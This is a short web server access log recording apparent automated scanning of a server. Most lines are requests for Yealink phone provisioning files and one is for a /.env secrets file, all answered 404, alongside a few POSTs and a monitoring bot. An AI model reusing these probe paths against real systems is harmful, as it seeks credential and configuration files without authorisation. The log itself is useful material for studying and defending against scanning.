193.42.32.170 - - [01/Aug/2023:12:57:14 +0200] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
212.91.246.72 - - [01/Aug/2023:12:57:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
95.111.236.86 - - [01/Aug/2023:12:57:30 +0200] "GET /yealink/phone/y000000000044.cfg HTTP/1.1" 404 336 "-" "libwww-perl/6.72"
95.111.236.86 - - [01/Aug/2023:12:57:30 +0200] "GET /yealink/phone/y000000000044.cfg HTTP/1.1" 404 336 "-" "libwww-perl/6.72"
95.111.236.86 - - [01/Aug/2023:12:57:30 +0200] "GET /yealink/phone/y000000000044.cfg HTTP/1.1" 404 336 "-" "libwww-perl/6.72"
95.111.236.86 - - [01/Aug/2023:12:57:30 +0200] "GET /yealink/phone/y000000000044.cfg HTTP/1.1" 404 336 "-" "libwww-perl/6.72"
95.111.236.86 - - [01/Aug/2023:12:57:31 +0200] "GET /yealink/phone/y000000000044.cfg HTTP/1.1" 404 336 "-" "libwww-perl/6.72"
95.111.236.86 - - [01/Aug/2023:12:57:31 +0200] "GET /yealink/phone/y000000000044.cfg HTTP/1.1" 404 336 "-" "libwww-perl/6.72"
95.111.236.86 - - [01/Aug/2023:12:57:31 +0200] "GET /yealink/phone/y000000000000.cfg HTTP/1.1" 404 336 "-" "libwww-perl/6.72"
95.111.236.86 - - [01/Aug/2023:12:57:31 +0200] "GET /yealink/phone/y000000000044.cfg HTTP/1.1" 404 336 "-" "libwww-perl/6.72"
95.111.236.86 - - [01/Aug/2023:12:57:31 +0200] "GET /yealink/phone/y000000000044.cfg HTTP/1.1" 404 336 "-" "libwww-perl/6.72"
95.111.236.86 - - [01/Aug/2023:12:57:31 +0200] "GET /yealink/phone/y000000000044.cfg HTTP/1.1" 404 336 "-" "libwww-perl/6.72"
95.111.236.86 - - [01/Aug/2023:12:57:31 +0200] "GET /yealink/phone/y000000000044.cfg HTTP/1.1" 404 336 "-" "libwww-perl/6.72"
95.111.236.86 - - [01/Aug/2023:12:57:31 +0200] "GET /yealink/phone/y000000000000.cfg HTTP/1.1" 404 336 "-" "libwww-perl/6.72"
193.42.32.170 - - [01/Aug/2023:12:57:31 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
95.111.236.86 - - [01/Aug/2023:12:57:31 +0200] "GET /yealink/phone/y000000000000.cfg HTTP/1.1" 404 336 "-" "libwww-perl/6.72"
193.42.32.170 - - [01/Aug/2023:12:57:31 +0200] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
95.111.236.86 - - [01/Aug/2023:12:57:32 +0200] "GET /yealink/phone/y000000000000.cfg HTTP/1.1" 404 336 "-" "libwww-perl/6.72"
